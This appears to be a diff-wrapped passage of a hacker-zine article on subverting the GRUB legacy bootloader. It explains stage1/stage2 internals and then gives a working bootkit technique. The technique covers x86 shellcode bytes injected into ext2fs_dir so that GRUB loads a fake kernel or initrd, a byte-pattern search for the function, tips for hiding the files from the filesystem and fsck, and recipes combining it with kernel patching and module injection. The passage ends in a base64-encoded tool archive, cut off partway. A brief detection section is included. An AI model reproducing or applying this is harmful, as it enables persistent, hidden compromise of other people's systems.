+	.word (STAGE2_SIZE + 511) >> 9
+#endif
+blocklist_default_seg:
+#ifdef STAGE1_5
+	.word 0x220
+#else
+	.word 0x820	/* this is the segment of the starting address
+			   to load the data into */
+#endif
+firstlist:	/* this label has to be after the list data!!! */
+--------------------------------- END ------------------------------------
+
+    an example: 
+# hexdump -x -n 512 /boot/grub/stage2
+    ...
+00001d0  [ 0000    0000    0000    0000 ][ 0000    0000    0000    0000 ]
+00001e0  [ 62c7    0026    0064    1600 ][ 62af    0026    0010    1400 ]
+00001f0  [ 6287    0026    0020    1000 ][ 61d0    0026    003f    0820 ]
+
+    We should interpret(backwards) it as: load 0x3f sectors(start with No.
+0x2661d0) to 0x0820:0000, load 0x20 sectors(start with No.0x266287) to
+0x1000:0000, load 0x10 sectors(start with No.0x2662af) to 0x1400:00, load
+0x64 sectors(start with No.0x2662c7) to 0x1600:0000. 
+    In my distro, stage2 has 0xd4(1+0x3f+0x20+0x10+0x64) sectors, file size
+is 108328 bytes, the two matches well(sector size is 512).
+
+    When start.S finishes running, stage1_5/stage2 is fully loaded. start.S
+jumps to asm.S and continues to execute.
+
+    There still remains a problem, when is stage1.5 configured? In fact,
+stage1.5 is not necessary. Its task is to load /boot/grub/stage2 to
+memory. But pay attention, stage1.5 uses file system to load file stage2:
+It analyzes the dentry, gets stage2's inode, then stage2's blocklists. So
+if stage1.5 is configured, the stage2 is loaded via file system; if not,
+stage2 is loaded via both stage2_sector in stage1 and sector lists in
+start.S of stage2.
+    To make things clear, suppose the following scenario: (ext2/ext3)
+       # mv /boot/grub/stage2 /boot/grub/stage2.bak
+    If stage1.5 is configured, the boot fails, stage1.5 can't find
+/boot/grub/stage2 in the file-system. But if stage1.5 is not configured,
+the boot succeeds! That's because mv doesn't change stage2's physical
+layout, so stage2_sector remains the same, also the sector lists in stage2.
+
+    Now, stage1 (-> stage1.5) -> stage2. Everything is in position. asm.S
+will switch to protected mode, open /boot/grub/grub.conf(or menu.lst), get
+configuration, display menus, and wait for user's interaction. After user
+chooses the kernel, grub loads the specified kernel image(sometimes
+ramdisk image also), then boots the kernel.
+
+----[ 1.4 - Grub util
+
+    If your grub is overwritten by Windows, you can use grub util to
+reinstall grub.
+
+    # grub
+    ---
+    grub > find /grub/stage2      <- if you have boot partition
+    or
+    grub > find /boot/grub/stage2 <- if you don't have boot partition
+    ---
+    (hd0,0)                       <= the result of 'find'
+    grub > root (hd0,0)           <- set root of boot partition
+    ---
+    grub > setup (hd0)            <- if you want to install grub in mbr
+    or
+    grub > setup (hd0,0)          <- if you want to install grub in the
+    ---                              boot sector
+    Checking if "/boot/grub/stage1" exists... yes
+    Checking if "/boot/grub/stage2" exists... yes
+    Checking if "/boot/grub/e2fs_stage1_t" exists... yes
+    Running "embed /boot/grub/e2fs_stage1_5 (hd0)"... 22 sectors are
+embedded succeeded.                <= if you install grub in boot sector,
+                                     this fails
+    Running "install /boot/grub/stage1 d (hd0) (hd0)1+22 p
+(hd0,0)/boot/grub/stage2 /boot/grub/grub.conf"... succeeded
+    Done
+
+    We can see grub util tries to embed stage1.5 if possible. If grub is
+installed in MBR, stage1.5 is located after MBR, 22 sectors in size. If
+grub is installed in boot sector, there's not enough space to embed
+stage1.5(superblock is at offset 0x400 for ext2/ext3 partition, only 0x200
+for stage1.5), so the 'embed' command fails.
+    Refer to grub manual and source codes for more info.
+
+--[ 2.0 - Possibility to load specified file
+
+    Grub has its own mini-file-system for ext2/3. It use grub_open(),
+grub_read() and grub_close() to open/read/close a file. Now, take a look at
+ext2fs_dir
+
+/* preconditions: ext2fs_mount already executed, therefore supblk in buffer
+ *                known as SUPERBLOCK 
+ * returns: 0 if error, nonzero iff we were able to find the file
+ *          successfully
+ * postconditions: on a nonzero return, buffer known as INODE contains the
+ *                 inode of the file we were trying to look up
+ * side effects: messes up GROUP_DESC buffer area
+ */
+int ext2fs_dir (char *dirname) {
+  int current_ino = EXT2_ROOT_INO;	/*start at the root */
+  int updir_ino = current_ino;	/* the parent of the current directory */
+  ...
+}
+
+    Suppose the line in grub.conf is:
+    kernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1
+    grub_open calls ext2fs_dir("/boot/vmlinuz-2.6.11 ro root=/dev/hda1"),
+ext2fs_dir puts the inode info in INODE, then grub_read can use INODE to
+get data of any offset(the map resides in INODE->i_blocks[] for direct
+blocks).
+
+    The internal of ext2fs_dir is:
+    1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
+       ^ inode = EXT2_ROOT_INO, put inode info in INODE;
+    2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
+        ^ find dentry in '/', then put the inode info of '/boot' in INODE;
+    3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
+             ^ find dentry in '/boot', then put the inode info of
+             '/boot/vmlinuz-2.6.11' in INODE;
+    4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
+                           ^ the pointer is space, INODE is regular file,
+                           returns 1(success), INODE contains info about
+                           '/boot/vmlinuz-2.6.11'.
+    If we parasitize this code, and return inode info of file_fake, grub
+will happily load file_fake, considering it as /boot/vmlinuz-2.6.11.
+    We can do this:
+    1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
+       ^ inode = EXT2_ROOT_INO;
+    2.  boot/vmlinuz-2.6.11 ro root=/dev/hda1
+       ^ change it to 0x0, change EXT2_ROOT_INO to inode of file_fake;
+    3.  boot/vmlinuz-2.6.11 ro root=/dev/hda1
+       ^ EXT2_ROOT_INO(file_fake) info is in INODE, the pointer is 0x0,
+       INODE is regular file, returns 1.
+
+    Since we change the argument of ext2fs_dir, does it have side-effects?
+Don't forget the latter part "ro root=/dev/hda1", it's the parameter passed
+to kernel. Without it, the kernel won't boot correctly. 
+(P.S.: Just "cat/proc/cmdline" to see the parameter your kernel has.)
+    So, let's check the internal of "kernel=..."
+    kernel_func processes the "kernel=..." line
+
+static int
+kernel_func (char *arg, int flags)
+{
+  ...
+  /* Copy the command-line to MB_CMDLINE.  */
+  grub_memmove (mb_cmdline, arg, len + 1);
+  kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags);
+  ...
+}
+
+    See? The arg and mb_cmdline have 2 copies of string
+"/boot/vmlinuz-2.6.11 ro root=/dev/hda1" (there is no overlap, so in fact,
+grub_memmove is the same as grub_memcpy). In load_image, you can find arg
+and mb_cmdline don't mix with each other. So, the conclusion is - NO
+side-effects. If you're not confident, you can add some codes to get things
+back.
+
+--[ 3.0 - Hacking techniques
+
+    The hacking techniques should be general for all grub versions(exclude
+grub-ng) shipped with all Linux distros.
+
+----[ 3.1 - How to load file_fake
+
+    We can add a jump at the beginning of ext2fs_dir, then make the first
+character of ext2fs_dir's argument to 0, make "current_ino = EXT2_ROOT_INO"
+to "current_ino = INODE_OF_FAKE_FILE", then jump back. 
+    Attention: Only when certain condition is met can you load file_fake. 
+e.g.: When system wants to open /boot/vmlinuz-2.6.11, then /boot/file_fake
+is returned; while when system wants /boot/grub/grub.conf, the correct file
+should be returned. If the codes still return /boot/file_fake, oops, no
+menu display.
+    Jump is easy, but how to make "current_ino = INODE_OF_FAKE_FILE"?
+int ext2fs_dir (char *dirname) {
+  int current_ino = EXT2_ROOT_INO;	/*start at the root */
+  int updir_ino = current_ino;	/* the parent of the current directory */
+ ...
+    EXT2_ROOT_INO is 2, so current_ino and updir_ino are initialized to 2.
+The correspondent assembly code should be like "movl $2, 0xffffXXXX($esp)"
+But keep in mind of optimization: both current_ino and updir_ino are
+assigned to 2, the optimized result can be "movl $2, 0xffffXXXX($esp)"
+and "movl $2, 0xffffYYYY($esp)", or "movl $2, %reg" then "movl %reg,
+0xffffXXXX($esp)" "movl %reg, 0xffffYYYY($esp)", or more variants. The type
+is int, value is 2, so the possibility of "xor %eax, %eax; inc %eax; 
+inc %eax" is low, it's also the same to "xor %eax, %eax; movb $0x2, %al". 
+What we need is to search 0x00000002 from ext2fs_dir to ext2fs_dir + 
+depth(e.g.: 100 bytes), then change 0x00000002 to INODE_OF_FAKE_FILE.
+
+static char ext2_embed_code[] = {
+
+	0x60,				/* pusha			*/
+	0x9c,				/* pushf			*/
+	0xeb, 0x28,			/* jmp 4f			*/
+	0x5f,				/* 1: pop %edi			*/
+	0x8b, 0xf,			/* movl (%edi), %ecx		*/
+	0x8b, 0x74, 0x24, 0x28,		/* movl 40(%esp), %esi		*/
+	0x83, 0xc7, 0x4,		/* addl $4, %edi		*/
+	0xf3, 0xa6,		/* repz cmpsb %es:(%edi), %ds:(%esi)	*/
+	0x83, 0xf9, 0x0,		/* cmp $0, %ecx			*/
+	0x74, 0x2,			/* je 2f			*/
+	0xeb, 0xe, 			/* jmp 3f			*/
+	0x8b, 0x74, 0x24, 0x28,		/* 2: movl 40(%esp), %esi	*/
+	0xc6, 0x6, 0x00,		/* movb $0x0, (%esi)  	'\0' 	*/
+	0x9d,				/* popf				*/
+	0x61,				/* popa				*/
+	0xe9, 0x0, 0x0, 0x0, 0x0,	/* jmp change_inode		*/
+	0x9d,				/* 3: popf			*/
+	0x61,				/* popa				*/
+	0xe9, 0x0, 0x0, 0x0, 0x0,	/* jmp not_change_inode		*/
+	0xe8, 0xd3, 0xff, 0xff, 0xff,	/* 4: call 1b			*/
+	
+	0x0, 0x0, 0x0, 0x0,		/* kernel filename length	*/
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,	/* filename string, 48B in all	*/
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
+	0x0, 0x0, 0x0, 0x0, 0x0, 0x0
+};
+
+memcpy(	buf_embed, ext2_embed_code, sizeof(ext2_embed_code));
+Of course you can write your own string-comparison algorithm.
+
+/* embeded code, 2nd part, change_inode */
+memcpy(	buf_embed + sizeof(ext2_embed_code), s_start, s_mov_end - s_start);
+modify_EXT2_ROOT_INO_to_INODE_OF_FAKE_FILE();
+
+/* embeded code, 3rd part, not_change_inode*/
+memcpy(	buf_embed + sizeof(ext2_embed_code) + (s_mov_end - s_start) + 5,
+	s_start, s_mov_end - s_start);
+
+  The result is like this:
+
+ ext2fs_dir:                                   not_change_inode:
+  +------------------------+        +--------> +------------------------+
+  | push %esp <= jmp embed |        |          | push %esp              |
+  | mov %esp, %ebp         |        |          | mov %esp, %ebp         |
+  | push %edi              |        |          | push %edi              |
+  | push %esi              +--------<          | push %esi              |
+  | sub $0x42c, %esp       |        |          | sub $0x42c, %esp       |
+  | mov $2, fffffbe4(%esp) |        |          | mov $2, fffffbe4(%esp) |
+  | mov $2, fffffbe0(%esp) |        |          | mov $2, fffffbe0(%esp) |
+  |back:                   |        |          | jmp back               |
+  +------------------------+        |          +------------------------+
+ embed:                             +--------> change_inode:
+  +------------------------+                   +------------------------+
+  | save registers         |                   | push %esp              |
+  | compare strings        |                   | mov %esp, %ebp         | 
+  | if match, goto 1       |                   | push %edi              |
+  | if not, goto 2         |                   | push %esi              |
+  | 1: restore registers   |                   | sub $0x42c, %esp       |
+  | jmp change_inode       |   INODE_OF_   ->  | mov $?, fffffbe4(%esp) |
+  | 2: restore registers   |   FAKE_FILE   ->  | mov $?, fffffbe0(%esp) |
+  | jmp not_change_inode   |                   | jmp back               |
+  +------------------------+                   +------------------------+
+
+----[ 3.2 - How to locate ext2fs_dir
+
+    That's the difficult part. stage2 is generated by objcopy, so all ELF
+information are stripped - NO SYMBOL TABLE! We must find some PATTERNs to
+locate ext2fs_dir.
+
+    The first choice is log2:
+    #define long2(n) ffz(~(n))
+    static __inline__ unsigned long
+    ffz (unsigned long word)
+    {
+        __asm__ ("bsfl %1, %0"
+                :"=r" (word)
+                :"r" (~word));
+        return word;
+    }
+    group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK));
+
+    The question is, ffz is declared as __inline__, which indicates MAYBE
+this function is inlined, MAYBE not. So we give it up.
+
+    Next choice is SUPERBLOCK->s_inodes_per_group in
+    group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);
+    #define RAW_ADDR(x) (x)
+    #define FSYS_BUF RAW_ADDR(0x68000)
+    #define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))
+    struct ext2_super_block{
+        ...
+        __u32 s_inodes_per_group	/* # Inodes per group */
+        ...
+    }
+
+    Then we calculate SUPERBLOCK->s_inodes_per_group is at 0x68028. This
+address only appears in ext2fs_dir, so the possibility of collision is low.
+After locating 0x68028, we move backwards to get the start of ext2fs_dir.
+Here comes another question, how to identify the start of ext2fs_dir? Of
+course you can search backwards for 0xc3, likely it's ret. But what if it's
+only part of an instruction such as operands? Also, sometimes, gcc adds
+some junk codes to make function address aligned(4byte/8byte/16byte), then
+how to skip these junk codes? Just list all the possible combinations?
+    This method is practical, but not ideal.
+
+    Now, we noticed fsys_table:
+
+    struct fsys_entry fsys_table[NUM_FSYS + 1] =
+    {
+      ...
+    # ifdef FSYS_FAT
+      {"fat", fat_mount, fat_read, fat_dir, 0, 0},
+    # endif
+    # ifdef FSYS_EXT2FS
+      {"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0},
+    # endif
+    # ifdef FSYS_MINIX
+      {"minix", minix_mount, minix_read, minix_dir, 0, 0},
+    # endif
+      ...
+    };
+
+    fsys_table is called like this:
+
+      if ((*(fsys_table[fsys_type].mount_func)) () != 1)
+
+    So, our trick is: 
+1. Search stage2 for string "ext2fs", get its offset, then convert it to
+   memory address(stage2 starts from 0800:0000) addr_1.
+2. Search stage2 for addr_1, get its offset, then get next 5 integers
+   (A, B, C, D, E), A<B ? B<C ? C<addr_1 ? D==0 ? E==0? If any one is "No",
+   goto 1 and continue search
+3. Then C is memory address of ext2fs_dir, convert it to file offset. OK,
+   that's it.
+
+----[ 3.3 - How to hack grub
+
+    OK, with the help of 3.1 and 3.2, we can hack grub very easily.
+    The first target is stage2. We get the start address of ext2fs_dir, add
+a JMP to somewhere, then copy the embeded code. Then where is 'somewhere'?
+Obviously, the tail of stage2 is not perfect, this will change the file
+size. We can choose minix_dir as our target. What about fat_mount? It's
+right behind ext2fs_dir. But the answer is NO! Take a look at "root ..."
+
+    root_func()->open_device()->attemp_mount()
+    for (fsys_type = 0; fsys_type < NUM_FSYS
+         && (*(fsys_table[fsys_type].mount_func)) () != 1; fsys_type++);
+
+    Take a look at fsys_table, fat is ahead of ext2, so fat_mount is called
+first. If fat_mount is modified, god knows the result. To make things safe,
+we choose minix_dir.
+
+    Now, your stage2 can load file_fake. Size remains the same, but hash
+value changed.
+
+----[ 3.4 - How to make things sneaky
+
+    Why must we use /boot/grub/stage2? We can get stage1 jump to
+stage2_fake(cp stage2 stage2_fake, modify stage2_fake), so stage2 remains
+intact. 
+    If you cp stage2 to stage2_fake, stage2_fake won't work. Remember the
+sector lists in start.S? You have to change the lists to stage2_fake, not
+the original stage2. You can retrieve the inode, get i_block[], then the
+block lists are there(Don't forget to add the partition offset). You have
+to bypass the VFS to get inode info, see [1].
+    Since you use stage2_fake, the correspondent address in stage1 should
+be modified. If the stage1.5 is not installed, that's easy, you just change
+stage2_sector from stage2_orig to stage2_fake(MBR is changed). If stage1.5
+is installed and you're lazy and bold, you can skip stage1.5 - modify
+stage2_address, stage2_sector, stage2_segment of stage1. This is risky, 
+because 1) If "virus detection" in BIOS is enabled, the MBR modification 
+will be detected 2) The "Grub stage1.5" & "Grub loading, please wait" will
+change to "Grub stage2". It's flashy, can you notice it on your FAST PC? 
+    If you really want to be sneaky, then you can hack stage1.5, using
+similiar techniques like 3.1 and 3.2. Don't forget to change the sector
+lists of stage1.5(start.S) - you have to append your embeded code at the
+end.
+    You can make things more sneaky: make stage2_fake/kernel_fake hidden
+from FS, e.g. erase its dentry from /boot/grub. Wanna anti-fsck? Move
+inode_of_stage2 to inode_from_1_to_10. See  [2]
+
+--[ 4.0 - Usage
+
+    Combined with other techniques, see how powerful our hack_grub is.
+    Notes: All files should reside in the same partition!
+    1) Combined with static kernel patch
+       a) cp kernel.orig kernel.fake
+       b) static kernel patch with kernel.fake[3]
+       c) cp stage2 stage2.fake
+       d) hack_grub stage2.fake kernel.orig inode_of_kernel.fake
+       e) hide kernel.fake and stage2.fake (optional)
+    2) Combined with module injection
+       a) cp initrd.img.orig initrd.img.fake
+       b) do module injection with initrd.img.fake, e.g. ext3.[k]o [4]
+       c) cp stage2 stage2.fake
+       d) hack_grub stage2.fake initrd.img inode_of_initrd.img.fake
+       e) hide initrd.img.fake and stage2.fake (optional)
+    3) Make a fake grub.conf
+    4) More...
+
+--[ 5.0 - Detection
+
+    1) Keep an eye on MBR and the following 63 sectors, also primary boot
+       sectors.
+    2) If not 1, 
+        a) if stage1.5 is configured, compare sectors from 3(absolute
+           address, MBR is sector No. 1) with /boot/grub/e2fs_stage1_5
+        b) if stage1.5 is not configured, see if stage2_sector points to
+           real /boot/grub/stage2 file
+    3) check the file consistency of e2fs_stage1_5 and stage2
+    4) if not 3 (Hey, are you a qualified sysadmin?)
+       if a) If you're suspicious about kernel, dump the kernel and make a
+             byte-to-byte with kernel on disk. See [5] for more
+          b) If you're suspicious about module, that's a hard challenge,
+             maybe you can dump it and disassemble it?
+
+--[ 6.0 - At the end
+
+    Lilo is another boot loader, but it's file-system-insensitive. So Lilo
+doesn't have built-in file-systems. It relies on /boot/bootsect.b and
+/boot/map.b. So, if you're lazy, write a fake lilo.conf, which displays
+a.img but loads b.img. Or, you can make lilo load /boot/map.b.fake. The
+details depend on yourself. Do it!
+
+    Thanks to madsys & grip2 for help me solve some hard-to-crack things;
+thanks to airsupply and other guys for stage2 samples (redhat 7.2/9/as3,
+Fedora Core 2, gentoo, debian and ubuntu), thanks to zhtq for some comments
+about paper-writing.
+
+--[ 7.0 - Ref
+
+[1] Design and Implementation of the Second Extended Filesystem
+    http://e2fsprogs.sourceforge.net/ext2intro.html
+[2] ways to hide files in ext2/3 filesystem (Chinese)
+    http://www.linuxforum.net/forum/gshowflat.php?Cat=&Board=security&
+    Number=545342&page=0&view=collapsed&sb=5&o=all&vc=1 
+[3] Static Kernel Patching
+    http://www.phrack.org/show.php?p=60&a=8
+[4] Infecting Loadable Kernel Modules
+    http://www.phrack.org/show.php?p=61&a=10
+[5] Ways to find 2.6 kernel rootkits (Chinese)
+    http://www.linuxforum.net/forum/gshowflat.php?Cat=&Board=security&
+    Number=540646&page=0&view=collapsed&sb=5&o=all&vc=1
+
+--[ 8 - hack_grub.tar.gz
+
+begin-base64 644 hack_grub.tar.gz
+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
